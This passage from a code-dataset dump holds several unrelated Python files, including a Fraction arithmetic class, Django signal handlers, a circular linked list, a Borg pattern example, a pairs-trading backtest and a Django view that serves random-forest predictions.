plt.ylabel('Claim Amount')\n\n plt.title('Monthly Claim Totals')\n plt.grid(True)\n\n plt.show()\n\n Anykey = input(\"Press any key to continue.\")\n\n\ndef main():\n while True:\n print()\n print(\"NL Chocolate Company - Travel Claims Processing System\")\n print()\n print(\"1. Enter an Employee Travel Claim.\")\n print(\"2. Edit System Default Values.\")\n print(\"3. Print the Travel Claim Report.\")\n print(\"4. Graph Monthly Claim Totals.\")\n print(\"5. Quit Program.\")\n print()\n while True:\n Choice = int(input(\"Enter choice (1-5): \"))\n IsValid = BP.ValidIntegerNumber(Choice, 1, 5)\n if IsValid:\n Choice = int(Choice)\n break\n if Choice == 1:\n TravelClaim(ClaimNumber)\n elif Choice == 2:\n EditDefaultValues()\n elif Choice == 3:\n PrintTravelReport()\n elif Choice == 4:\n GraphClaimTotals()\n else:\n print(\"Thank you for using NL Chocolate Company's Travel Claim Software!\")\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"150163284","text":"from amath import gcd, trunc, digits, intQ, isComplex, digitsafterdecimal\nfrom Symbols import *\nfrom functools import total_ordering\nfrom decimal import Decimal, InvalidOperation\nimport inspect\n\n\ndef dectofr(x):\n # type: (float) -> Fraction\n \"\"\"\n Converts decimals to fractions\n :param x: decimal to convert\n :return: Fraction\n\n >>> dectofr(2.5)\n 5/2\n >>> dectofr(0.25)\n 1/4\n >>> dectofr(2.1)\n 21/10\n\n Does work for int\n\n >>> dectofr(5)\n 5/1\n \"\"\"\n # n = int(floor(x))\n # x -= n\n # if x < error:\n # # return (n, 1)\n # return Fraction(n, 1)\n # elif 1 - error < x:\n # # return (n+1, 1)\n # return Fraction(n + 1, 1)\n #\n # # The lower fraction is 0/1\n # lower_n = 0\n # lower_d = 1\n # # The upper fraction is 1/1\n # upper_n = 1\n # upper_d = 1\n # while True:\n # # The middle fraction is (lower_n + upper_n) / (lower_d + upper_d)\n # middle_n = lower_n + upper_n\n # middle_d = lower_d + upper_d\n # # If x + error < middle\n # if middle_d * (x + error) < middle_n:\n # # middle is our new upper\n # upper_n = middle_n\n # upper_d = middle_d\n # # Else If middle < x - error\n # elif middle_n < (x - error) * middle_d:\n # # middle is our new lower\n # lower_n = middle_n\n # lower_d = middle_d\n # # Else middle is our best fraction\n # else:\n # # return (n * middle_d + middle_n, middle_d)\n # # return \"{0}/{1}\".format(n*middle_d+middle_n,middle_d)\n # return Fraction(n * middle_d + middle_n, middle_d)\n calframe = inspect.getouterframes(inspect.currentframe(), 2)\n print(\"dectofr caller name: \", calframe[1])\n x = float(x)\n n = x\n d = 1\n dig = digitsafterdecimal(x)\n multiplier = 10 ** dig\n # print(n, d, dig, multiplier, n * multiplier, d * multiplier)\n return Fraction(int(n * multiplier), int(d * multiplier))\n\n\ndef frtodec(x):\n \"\"\"\n Converts Fraction to decimal\n :param x: Fraction to be converted\n :return: Decimal\n\n >>> frtodec(Fraction(1,2))\n 0.5\n >>> frtodec(Fraction(1,3))\n 0.3333333333333333\n \"\"\"\n if not isinstance(x, Fraction):\n raise TypeError(\"Argument must be a fraction\")\n return float(x.numerator) / float(x.denominator)\n\n\n\n@total_ordering\nclass Fraction:\n \"\"\"\n Fraction data type\n \"\"\"\n\n def __init__(self, n=0, d=1):\n \"\"\"\n Fraction initialization\n :param n: numerator\n :param d: denomenator\n :return:\n :raises ZeroDivisionError:\n\n Create a Fraction\n\n >>> Fraction(5,2)\n 5/2\n >>> Fraction(-5,2)\n -5/2\n >>> Fraction(5,-2)\n -5/2\n >>> Fraction(4,10)\n 2/5\n \"\"\"\n curframe = inspect.currentframe()\n calframe = inspect.getouterframes(curframe, 2)\n print(\"__init__ caller name: \", calframe[1])\n self.onum = n\n self.oden = d\n self.numerator = n / gcd(abs(n), abs(d))\n self.denominator = d / gcd(abs(n), abs(d))\n self.whole = 0\n if type(self.denominator) is not complex:\n self.denominator = int(self.denominator)\n if type(self.numerator) is not complex:\n self.numerator = int(self.numerator)\n if (type(self.numerator) is not complex) and (type(self.denominator) is not complex):\n if self.denominator < 0:\n self.denominator = abs(self.denominator)\n self.numerator *= -1\n if self.denominator == 0:\n raise ZeroDivisionError\n self.value = n / d\n self.whole = trunc(self.value)\n self.attributes = {Attributes[0], Attributes[1]}\n\n def __add__(self, other):\n \"\"\"\n Adds to values\n :param other:\n :return:\n\n >>> Fraction(1,4) + Fraction(2,4)\n 3/4\n >>> Fraction(1,2) + Fraction(3,4)\n 5/4\n >>> Fraction(1,2) + 2\n 5/2\n >>> Fraction(1,2) + 2.5\n 3/1\n \"\"\"\n ax = other\n if not isinstance(other, Fraction):\n ax = dectofr(other)\n return Fraction(self.numerator * ax.denominator + self.denominator * ax.numerator,\n self.denominator * ax.denominator)\n\n __radd__ = __add__\n\n def __sub__(self, other):\n # type: (object) -> Fraction\n \"\"\"\n Subtract a value from Fraction\n\n :param other:\n :return:\n\n >>> Fraction(3, 4) - Fraction(1, 4)\n 1/2\n >>> Fraction(7, 4) - Fraction(3 ,4)\n 1/1\n >>> Fraction(6, 4) - 2\n -1/2\n >>> Fraction(11, 2) - 3.5\n 2/1\n\n \"\"\"\n dx = other\n if not isinstance(other, Fraction):\n dx = dectofr(other)\n return Fraction(self.numerator * dx.denominator - self.denominator * dx.numerator,\n self.denominator * dx.denominator)\n\n def __rsub__(self, other):\n dx = other\n if not isinstance(other, Fraction):\n dx = dectofr(other)\n return Fraction(dx.numerator * self.denominator - self.numerator * dx.denominator,\n self.denominator * other.denominator)\n\n def __mul__(self, other):\n # type: (object) -> Fraction\n \"\"\"\n Multiplication\n :param other:\n :return:\n\n >>> Fraction(1,2) * Fraction(5,4)\n 5/8\n >>> Fraction(1,2) * 4\n 2/1\n >>> Fraction(1,3) * 2.5\n 5/6\n \"\"\"\n try:\n other = float(other)\n except ValueError:\n return NotImplemented\n except TypeError:\n return NotImplemented\n mx = dectofr(other)\n return Fraction(self.numerator * mx.numerator, self.denominator * mx.denominator)\n\n __rmul__ = __mul__\n\n def __truediv__(self, other):\n dx = other\n if not isinstance(other, Fraction):\n dx = dectofr(other)\n return Fraction(self.numerator * dx.denominator, self.denominator * dx.numerator)\n\n def __rtruediv__(self, other):\n dx = other\n if not isinstance(other, Fraction):\n dx = dectofr(other)\n return Fraction(dx.numerator * self.denominator, dx.denominator * self.numerator)\n\n def __div__(self, other):\n \"\"\"\n Division\n :param other:\n :return:\n\n Uses truediv\n\n >>> Fraction(1,2) / Fraction(3,4)\n 2/3\n >>> Fraction(1,2) / 2\n 1/4\n >>> Fraction(1,4) / 0.5\n 1/2\n \"\"\"\n return self.__truediv__(other)\n\n def __pow__(self, power, modulo=None):\n y = pow(self.numerator, power)\n z = pow(self.denominator, power)\n if modulo is not None:\n return Fraction(y, z) % modulo\n return Fraction(y, z)\n\n def __rpow__(self, other, modulo=None):\n from amath.Computation.power import root\n return pow(root(other, self.denominator), self.numerator)\n\n def __str__(self):\n return \"%s/%s\" % (self.numerator, self.denominator)\n\n # def __cmp__(self, other):\n # \"\"\"\n # compare two values\n # :param other:\n # :return:\n #\n # >>> Fraction(1,2) < Fraction(2,3)\n # True\n # >>> Fraction(2,3) == Fraction(4,6)\n # True\n # >>> Fraction(1,3) < 1\n # True\n # >>> Fraction(5,2) > 2.5\n # False\n # \"\"\"\n # if type(other) is float:\n # other = dectofr(other)\n # a = Fraction(self.numerator * other.denominator, self.denominator * other.denominator)\n # b = Fraction(other.numerator * self.denominator, self.denominator * other.denominator)\n # if a.onum > b.onum:\n # return 1\n # elif a.onum is b.onum:\n # return 0\n # else:\n # return -1\n\n def __eq__(self, other):\n if not isinstance(other, Fraction):\n other = dectofr(other)\n a = Fraction(self.numerator * other.denominator, self.denominator * other.denominator)\n b = Fraction(other.numerator * self.denominator, self.denominator * other.denominator)\n if a.onum == b.onum:\n return True\n else:\n return False\n\n def __lt__(self, other):\n if not isinstance(other, Fraction):\n other = dectofr(other)\n a = Fraction(self.numerator * other.denominator, self.denominator * other.denominator)\n b = Fraction(other.numerator * self.denominator, self.denominator * other.denominator)\n if a.onum < b.onum:\n return True\n else:\n return False\n\n def __nonzero__(self):\n \"\"\"\n Non Zero\n :return:\n\n \"\"\"\n if self != 0:\n return True\n else:\n return False\n\n def __repr__(self):\n try:\n return self.__str__()\n except AttributeError:\n return str(None)\n\n def digits(self):\n x = frtodec(self)\n return digits(x)\n\n def is_int(self):\n if self.denominator == 1:\n return True\n else:\n return False\n\n def __trunc__(self):\n return self.whole\n\n def __float__(self):\n \"\"\"\n Convert to float\n :return:\n\n >>> float(Fraction(1,2))\n 0.5\n >>> float(Fraction(1,25))\n 0.04\n >>> float(Fraction(5,2))\n 2.5\n \"\"\"\n return frtodec(self)\n\n def __mod__(self, other):\n \"\"\"\n Modulus\n :param other:\n :return:\n\n >>> Fraction(1,2) % 2\n 1/2\n >>> Fraction(1,2) % Fraction(1,3)\n 1/6\n \"\"\"\n z = trunc(self / other)\n a = self - (other * z)\n return a\n\n def __abs__(self):\n if self.numerator < 0:\n return Fraction(-self.numerator, self.denominator)\n else:\n return self\n\n def __neg__(self):\n return Fraction(-self.numerator, self.denominator)\n\n def __pos__(self):\n return Fraction(self.numerator, self.denominator)\n\n\n@total_ordering\nclass Complex:\n\n def __init__(self, value: complex = 0j):\n self.imag = Decimal(value.imag)\n self.real = Decimal(value.real)\n self.value = Decimal(value)\n self.attributes = {Attributes[0], Attributes[1]}\n\n def conjugate(self):\n return self.real - (self.imag * 1j)\n\n","sub_path":"datatypes.py","file_name":"datatypes.py","file_ext":"py","file_size_in_byte":10354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"449076353","text":"from django.db.models.signals import post_save, pre_delete, post_delete\nfrom django.dispatch import receiver\nfrom library_preparation.models import LibraryPreparation\nfrom pooling.models import Pooling\nfrom .models import Pool\n\n\n@receiver(post_save, sender=Pool)\ndef update_pool_name_size(sender, instance, created, **kwargs):\n # Update the name only for a just created pool\n if created:\n instance.name = str(instance.id) + instance.name\n instance.save()\n\n # Update Pool Size\n update_fields = kwargs.pop('update_fields')\n if update_fields and update_fields == {'size'}:\n libraries = instance.libraries.all()\n samples = instance.samples.all()\n instance.size += sum([l.sequencing_depth for l in libraries])\n instance.size += sum([s.sequencing_depth for s in samples])\n instance.save()\n\n\n@receiver(pre_delete, sender=Pool)\ndef delete_dependent_objects(sender, instance, **kwargs):\n libraries = instance.libraries.all()\n samples = instance.samples.all()\n\n for library in libraries:\n library.is_pooled = False\n library.save(update_fields=['is_pooled'])\n\n for sample in samples:\n sample.is_pooled = False\n sample.save(update_fields=['is_pooled'])\n\n # Delete all dependent Library Preparation and Pooling objects\n LibraryPreparation.objects.filter(sample__in=samples).delete()\n Pooling.objects.filter(library__in=libraries).delete()\n Pooling.objects.filter(sample__in=samples).delete()\n\n\n@receiver(post_delete, sender=Pool)\ndef delete_file(sender, instance, **kwargs):\n # Delete uploaded file after deleting a pool\n if instance.file:\n instance.file.delete(False)\n","sub_path":"index_generator/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"3896191","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*- \n# @author: Shengjia Yan\n# @date: 2018-10-30 Tuesday\n# @email: i@yanshengjia.com\n# Copyright @ Shengjia Yan. All Rights Reserved.\n\"\"\"\nThis module contains the status codes for exceptions.\n\"\"\"\n\n\nstatus_code = {\n 'OK': 1,\n 'BAD_SRC': 101, # all candidate scores < -0.4\n}\n","sub_path":"utils/status_code.py","file_name":"status_code.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"411855219","text":"import Domain.ListController\nclass CircularList:\n\n def __init__(self, data, identifier):\n self.data = data\n self.nextNode = None\n self.prevNode = None\n self.identifier = identifier\n\n def insertAtPoint(self, data, head, tail, nodes):\n auxNode = head\n newNode = CircularList(data, head.identifier)\n\n if head.data is None:\n head = newNode\n tail = newNode\n head.nextNode = tail\n head.prevNode = tail\n tail.nextNode = head\n tail.prevNode = head\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n elif head.data[1] > newNode.data[1]:\n newNode.nextNode = head\n newNode.prevNode = tail\n head.prevNode = newNode\n tail.nextNode = newNode\n head = newNode\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n elif tail.data[1] < newNode.data[1]:\n tail.nextNode = newNode\n newNode.nextNode = head\n newNode.prevNode = tail\n head.prevNode = newNode\n tail = newNode\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n else:\n for x in range(0,nodes):\n if auxNode.data[1] < newNode.data[1]:\n auxNode = auxNode.nextNode\n else:\n auxNode = auxNode.prevNode\n break\n\n newNode.nextNode = auxNode.nextNode\n auxNode.nextNode = newNode\n newNode.prevNode = auxNode\n newNode.nextNode.prevNode = newNode\n tail = head.prevNode\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n'''\nExtra code\nNot tested with the project actual functionality\n\n def deleteNode(self, data, head, tail, nodes):\n\n auxNode = head\n if nodes != 0:\n if head.data == data:\n auxNode.prevNode.nextNode = auxNode.nextNode\n auxNode.nextNode.prevNode = auxNode.prevNode\n head = head.nextNode\n print(data, \" deleted\")\n nodes -= 1\n return Domain.ListController.updateElements(head, tail, nodes)\n elif tail.data == data:\n tail.prevNode.nextNode = tail.nextNode\n tail.nextNode.prevNode = tail.prevNode\n tail = tail.prevNode\n print(data, \" deleted\")\n nodes -= 1\n return Domain.ListController.updateElements(head, tail, nodes)\n else:\n while auxNode.nextNode != head:\n if auxNode.data == data:\n auxNode.prevNode.nextNode = auxNode.nextNode\n auxNode.nextNode.prevNode = auxNode.prevNode\n print(data, \" deleted\")\n nodes -= 1\n return Domain.ListController.updateElements(head, tail, nodes)\n auxNode = auxNode.nextNode\n print(data, \"Not found\")\n return\n else:\n print(\"Cannot delete, the list is empty\")\n return\n\n def updateElement(self, data, newData, head, tail, nodes):\n\n auxNode = data\n if nodes == 0:\n print(\"Cannot update, the list is empty\")\n return\n for x in range(0,nodes):\n if data == auxNode.data:\n auxNode.data = newData\n print(\"Value updated succesfully\")\n return Domain.ListController.updateElements(head, tail, nodes)\n else:\n auxNode = auxNode.nextNode\n print(\"The inserted value doesn't coincide with any Node value\")\n return\n\n\n def insertAtTail(self, data, head, tail, nodes):\n\n auxNode = head\n newNode = CircularList(data)\n\n if head.data is None:\n head = newNode\n tail = newNode\n head.nextNode = tail\n head.prevNode = tail\n tail.nextNode = head\n tail.prevNode = head\n nodes += 1\n return\n else:\n auxNode.prevNode.nextNode = newNode\n newNode.nextNode = auxNode\n newNode.prevNode = auxNode.prevNode\n auxNode.prevNode = newNode\n tail = head.prevNode\n nodes += 1\n return\n \n def insertAtHead(self, data, head, tail, nodes):\n\n newNode = CircularList(data)\n\n if head.data is None:\n head = newNode\n tail = newNode\n head.nextNode = tail\n head.prevNode = tail\n tail.nextNode = head\n tail.prevNode = head\n nodes += 1\n return\n\n else:\n newNode.nextNode = head\n newNode.prevNode = tail\n head.prevNode = newNode\n tail.nextNode = newNode\n head = newNode\n nodes += 1\n return\n \n def printList(self, head, tail, nodes):\n\n auxNode = head\n if nodes == 0:\n print(\"The list is empty\")\n return\n elif nodes == 1:\n print(\"(\", tail.data, \")<->\", head.data, \"<->(\", head.data, \")\")\n return\n else:\n print(\"(\", tail.data, \")\", end=\"\")\n for x in range(0, nodes):\n print(\"<->\", auxNode.data, end=\" \")\n auxNode = auxNode.nextNode\n print(\"<->(\", head.data, \")\")\n return\n'''","sub_path":"Domain/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"351781384","text":"\"\"\"\ntest_sfissues.py - tests for the sfissues module\nauthor: nu11us \n\"\"\"\n\nimport unittest\nfrom mock import MagicMock\nfrom modules import sfissues\nimport web\n\n\nclass TestSFIssues(unittest.TestCase):\n def setUp(self):\n self.phenny = MagicMock()\n self.input = MagicMock()\n\n def test_bugs(self):\n self.phenny.config.sf_issues_url = \"https://sourceforge.net/p/apertium/news/feed.rss\"\n self.input.nick = \"bbc\"\n sfissues.bugs(self.phenny, self.input)\n out = self.phenny.say.call_args[0][0]\n self.assertTrue(\"Basque-English 0.3.0 Released\" in out)","sub_path":"modules/test/test_sfissues.py","file_name":"test_sfissues.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"495678168","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n*這種模式是什麼?\n博格模式(Borg pattern)(也被稱為 Monostate pattern)是一種實現單例行為的方法,\n但是不是只有一個類的實例,而是有多個實例共享相同的狀態。換句話說,\n重點是共享狀態而不是共享實例標識。\n\n*這個例子做了什麼?\n要理解 Python 中此模式的實現,重要的是要知道,在 Python 中,\n實例屬性存儲在名為 __dict__ 的屬性字典中。 通常,每個實例都有自己的字典,\n但博格模式會修改它,以便所有實例都具有相同的字典。\n在此範例中,__shared_state 屬性將是在所有實例之間共享的字典,\n並且通過在初始化新實例時(即在 __init__ 方法中)\n將 __shared_state 賦值給 __dict__ 變數來確保這一點。其他屬性通常會添加到實例的屬性字典中,\n但是,由於屬性字典本身是共享的(即 __shared_state),因此所有其他屬性也將被共享。\n因此,當使用實例 rm2 修改屬性 self.state 時,實例 rm1 中 self.state 的值也會更改。\n如果使用 rm3 修改 self.state,則會發生同樣的情況,rm3 是子類別中的實例。\n請注意,即使它們共享屬性,實例也不同,如其 ID 所示。\n\n*該模式實際使用在哪裡?\n共享狀態在管理資料庫連接等應用程式中很有用:\nhttps://github.com/onetwopunch/pythonDbTemplate/blob/master/database.py\n\n*參考:\nhttps://fkromer.github.io/python-pattern-references/design/#singleton\n\n*TL;DR80\n在實例之間提供類似單一行為的行為共享狀態。\n\"\"\"\n\n\nclass Borg(object):\n __shared_state = {}\n\n def __init__(self):\n self.__dict__ = self.__shared_state\n self.state = 'Init'\n\n def __str__(self):\n return self.state\n\n\nclass YourBorg(Borg):\n pass\n\n\nif __name__ == '__main__':\n rm1 = Borg()\n rm2 = Borg()\n\n rm1.state = 'Idle'\n rm2.state = 'Running'\n\n print('rm1: {0}'.format(rm1))\n print('rm2: {0}'.format(rm2))\n\n rm2.state = 'Zombie'\n\n print('rm1: {0}'.format(rm1))\n print('rm2: {0}'.format(rm2))\n\n print('rm1 id: {0}'.format(id(rm1)))\n print('rm2 id: {0}'.format(id(rm2)))\n\n rm3 = YourBorg()\n\n print('rm1: {0}'.format(rm1))\n print('rm2: {0}'.format(rm2))\n print('rm3: {0}'.format(rm3))\n\n### OUTPUT ###\n# rm1: Running\n# rm2: Running\n# rm1: Zombie\n# rm2: Zombie\n# rm1 id: 140732837899224\n# rm2 id: 140732837899296\n# rm1: Init\n# rm2: Init\n# rm3: Init\n","sub_path":"patterns/creational/borg.py","file_name":"borg.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"589089308","text":"\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport statsmodels as sm\nfrom statsmodels.tsa.stattools import adfuller\n\npath = os.getcwd()\n\nprices = pd.read_csv(path + '/close.csv')\ndata = pd.DataFrame()\nprices['Date'] = pd.to_datetime(prices['Date'])\nprices.set_index('Date',inplace = True)\ntickers = list(data.columns.values)\ndata = prices/prices.iloc[0]\ntrading_data = data.loc[data.index > '2017-09-08']\ndata = data.loc[data.index < '2017-09-09']\nprices = prices.loc[prices.index > '2017-09-09']\n\ndef trading_signals(first, second, trading_data = trading_data, formation_data = data):\n signal = 2*np.std(formation_data[first] - formation_data[second])\n result_dict = {}\n trading = False\n differences = trading_data[first] - trading_data[second]\n for i in range(len(differences)):\n if trading == False:\n if abs(differences.iloc[i]) > signal and abs(differences.iloc[i] < 2*signal):\n trading = True\n start_date = differences.index.values[i]\n else:\n if (differences.iloc[i-1] * differences.iloc[i] < 0) or (i == len(differences)-1) or abs(differences.iloc[i] > 2*signal):\n trading = False\n end_date = differences.index.values[i]\n if differences[i-1] > 0:\n s_ret = (trading_data[first][start_date] - trading_data[first][end_date])/trading_data[first][start_date]\n l_ret = (trading_data[second][end_date] - trading_data[second][start_date])/trading_data[second][start_date]\n result_dict[start_date] = [first, second, start_date, end_date, s_ret,l_ret]\n else:\n s_ret = (trading_data[second][start_date] - trading_data[second][end_date])/trading_data[second][start_date]\n l_ret = (trading_data[first][end_date] - trading_data[first][start_date])/trading_data[first][start_date]\n result_dict[start_date] = [second, first, start_date, end_date, s_ret,l_ret]\n df = pd.DataFrame.from_dict(result_dict, orient = 'index', columns = ['Short','Long','Start','End', 'SReturn','LReturn'])\n df.index = list(range(len(df)))\n df['Total'] = df['SReturn'] + df['LReturn']\n df['Length'] = (df['End'] - df['Start']).dt.days\n return (df, len(df))\n\n\ndef build_portfolio(trade_list, trading_data = trading_data):\n index_list = trading_data.index.tolist()\n portfolio = pd.DataFrame(index = trading_data.index.values, columns = ['Short','Long','ShortR','LongR','Trading'])\n l = trade_list[1]\n trade_list = trade_list[0]\n for i in range(len(trade_list)):\n start = trade_list['Start'][i]\n end = trade_list['End'][i]\n short = trade_list['Short'][i]\n lon = trade_list['Long'][i]\n di = index_list.index(start)\n di2 = index_list.index(end)\n for j in range(di2 - di + 1):\n date_index = di + j\n dt = index_list[date_index]\n portfolio['Short'][dt] = trading_data[short][dt]/trading_data[short][index_list[di]]\n portfolio['Long'][dt] = trading_data[lon][dt]/trading_data[lon][index_list[di]]\n portfolio['Short'][dt] = trading_data[short][dt]/trading_data[short][index_list[di]]\n portfolio['Long'][dt] = trading_data[lon][dt]/trading_data[lon][index_list[di]]\n portfolio['Trading'][dt] = 1\n\n portfolio.fillna(value = 0, axis = 0)\n for j in range(1, len(portfolio)):\n if portfolio.iloc[j-1]['Short'] > 0:\n portfolio.iloc[j]['ShortR'] = -(portfolio.iloc[j]['Short'] - portfolio.iloc[j-1]['Short'])/portfolio.iloc[j-1]['Long']\n portfolio.iloc[j]['LongR'] = (portfolio.iloc[j]['Long'] - portfolio.iloc[j-1]['Long'])/portfolio.iloc[j-1]['Long']\n else:\n portfolio.iloc[j]['ShortR'] = 0\n portfolio.iloc[j]['LongR']= 0\n portfolio['Total'] = portfolio['ShortR'] + portfolio['LongR']\n portfolio.fillna(0, inplace = True)\n return (portfolio, l)\n\ndef analyze_portfolio(pairs):\n i = 0\n df = (build_portfolio(trading_signals(pairs[i][0], pairs[i][1]))[0])\n trade_count = build_portfolio(trading_signals(pairs[i][0], pairs[i][1]))[1]\n for i in range(1, len(pairs)):\n df = df + (build_portfolio(trading_signals(pairs[i][0], pairs[i][1])))[0]\n trade_count += build_portfolio(trading_signals(pairs[i][0], pairs[i][1]))[1]\n df_short = df['ShortR']/df['Trading']\n df_long = df['LongR']/df['Trading']\n df_final = pd.concat([df_short, df_long], axis=1)\n df_final.columns = ['Short Return','Long Return']\n df_final.index.name = 'Date'\n df_final['Total'] = df_final['Short Return'] + df_final['Long Return']\n df_final.fillna(0, inplace = True)\n arithemtic_daily_mean = np.mean(df_final['Total'])\n annualized_return = (1+arithemtic_daily_mean)**250 - 1\n annualized_std = np.std(df_final['Total'])*np.sqrt(250)\n sharpe_ratio = annualized_return/annualized_std\n return [annualized_return, annualized_std, sharpe_ratio, trade_count]\n\nprint(analyze_portfolio([['HON','NEE'], ['TXN','SYK'],['BDX','SYK'], ['HON','DHR'],['JPM','PNC']]))\n\n\n","sub_path":"statarb/trading.py","file_name":"trading.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627147995","text":"from django.shortcuts import render\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn import pipeline,preprocessing,metrics,model_selection,ensemble\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn import impute\nfrom sklearn.impute import SimpleImputer\nimport joblib as jb\n\n\n# Create your views here.\n\n# from . import service\n# from django.http import HttpResponse\n\n# def gett(request):\n# #article_data = service.get_data.all()\n# print(service.article_data)\n# return render(request, 'index.html', article_data)\n\n \n# import os\n# import requests\n# from requests.auth import HTTPBasicAuth\n\n# def api(request):\n# Company = request.POST.get('Company')\n# Position = request.POST.get('position')\n\n# url = os.environ.get(\"URL\", 'http://myhost:port/projectname/api/addposition?compName=Google&category=Developer')\n# url = \"%s\" % (url)\n# body = {\"Company\" : \"%s\" % Company, \"Position\" : \"%s\" % Position}response = requests.post(url, auth=HTTPBasicAuth('USER', 'PASSWORD'), headers={'Content-Type': 'application/json'}, json=body)\n# if response.status_code == 200:\n# print(\"Code 200\")\n# else:\n# print(\"Code not 200\")\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import render\nimport requests\nimport csv\nfrom . serializers import ApiSerializer\nfrom . models import Apimodel\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\n\n@api_view(['POST'])\ndef saveapi(request):\n\tif request.method =='POST':\n\t\ta=request.data\n\t\tprint(a)\n\t\tdata=pd.read_csv('datagas.csv')\n\t\tsaveserialize= ApiSerializer(data=request.data)\n\t\tmapper = DataFrameMapper([(['Quiz','sampletest','playing','sleeping','learning'], preprocessing.StandardScaler())])\n\t\tpipeline_obj = pipeline.Pipeline([('mapper',mapper),(\"model\", ensemble.RandomForestRegressor())])\n\t\t# data.columns\n\t\tX=['Quiz', 'sampletest', 'playing', 'sleeping','learning']\n\t\tY=['Total']\n\t\tpipeline_obj.fit(data[X],data[Y].values.ravel())\n\t\t#print(pipeline_obj.predict(data[X]))\n\t\tjb.dump(pipeline_obj,'RFModelforMPG.pkl')\n\t\tmodelReload=jb.load('RFModelforMPG.pkl')\n\t\ttestDtaa=pd.DataFrame({'x':request.data}).transpose()\n\t\tprint(testDtaa)\n\t\tif saveserialize.is_valid():\n\t\t\tsaveserialize.save()\n\t\t\tprint(request.data)\n\t\t\treturn Response(modelReload.predict(testDtaa)[0],status=status.HTTP_201_CREATED)\n\t\t\treturn Response(modelReload.predict(testDtaa)[0],status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n\n\n\n\n# def home(request):\n# \tresponse = requests.get('http://jsonplaceholder.typicode.com/users/')\n# \tgeodata = response.json()\n# \tprint([d['id'] for d in geodata if 'id' in d])\n# \tprint([d['name'] for d in geodata if 'name' in d])\n# \tprint([d['username'] for d in geodata if 'username' in d])\n# \tprint([d['email'] for d in geodata if 'email' in d])\n# \tout=zip([d['id'] for d in geodata if 'id' in d],[d['name'] for d in geodata if 'name' in d],[d['username'] for d in geodata if 'username' in d],[d['email'] for d in geodata if 'email' in d])\n# \twith open('outdatacsv.csv', 'w',newline='') as file:\n# \t\twriter = csv.writer(file)\n# \t\twriter.writerow(['Quiz','sampletest','playing','sleeping','learning'])\n# \t\twriter.writerows([(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# 